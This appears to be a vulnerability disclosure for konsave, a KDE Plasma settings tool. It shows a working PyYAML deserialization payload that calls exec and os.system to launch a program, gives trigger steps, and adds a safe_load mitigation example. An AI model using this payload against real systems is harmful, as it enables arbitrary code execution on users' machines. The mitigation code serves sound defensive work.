konsave is a CLI program that lets you save and apply your KDE Plasma customizations with a single command. It is vulnerable to a YAML deserialization attack: unsafe loading of YAML leads to arbitrary code execution.
pip install konsave
payload = """cmd: !!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('xcalc')"
"""
Now copy conf.yaml and paste it into the konsave directory.
Run the command below:
konsave -s test
This will create a profile, and code execution will occur along with it.
Arbitrary Code Execution
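The mitigation for this class of bug is to parse the config with PyYAML's SafeLoader, which builds only plain data and rejects Python-specific tags. The following is an added example, not konsave's own code: the helper names and the sample config contents are constructed for illustration, and it assumes PyYAML is the parser in use.

```python
import yaml  # PyYAML

# Constructed sample inputs (not taken from a real konsave install).
BENIGN_CONF = """
save:
  name: test
  entries: [kdeglobals, kwinrc]
"""
# Reuses one Python-specific tag from the report. An unsafe loader would
# resolve it to a live Python object instead of plain data.
TAGGED_CONF = "cmd: !!python/name:exec\n"


class UnsafeConfigError(ValueError):
    """Raised when a config file is not plain YAML data."""


def load_profile_config(text):
    """Parse config text with SafeLoader (hypothetical helper name)."""
    try:
        # safe_load only constructs str/int/float/bool/None/list/dict
        # and the other standard YAML types.
        data = yaml.safe_load(text)
    except yaml.constructor.ConstructorError as exc:
        # Raised for any tag SafeLoader has no constructor for,
        # including every !!python/... tag.
        raise UnsafeConfigError(f"rejected YAML tag: {exc.problem}") from exc
    if not isinstance(data, dict):
        raise UnsafeConfigError("top level of config must be a mapping")
    return data


def is_rejected(text):
    """Return True if the config is refused, False if it loads."""
    try:
        load_profile_config(text)
    except UnsafeConfigError:
        return True
    return False


if __name__ == "__main__":
    print(load_profile_config(BENIGN_CONF))
    print("tagged config rejected:", is_rejected(TAGGED_CONF))
```
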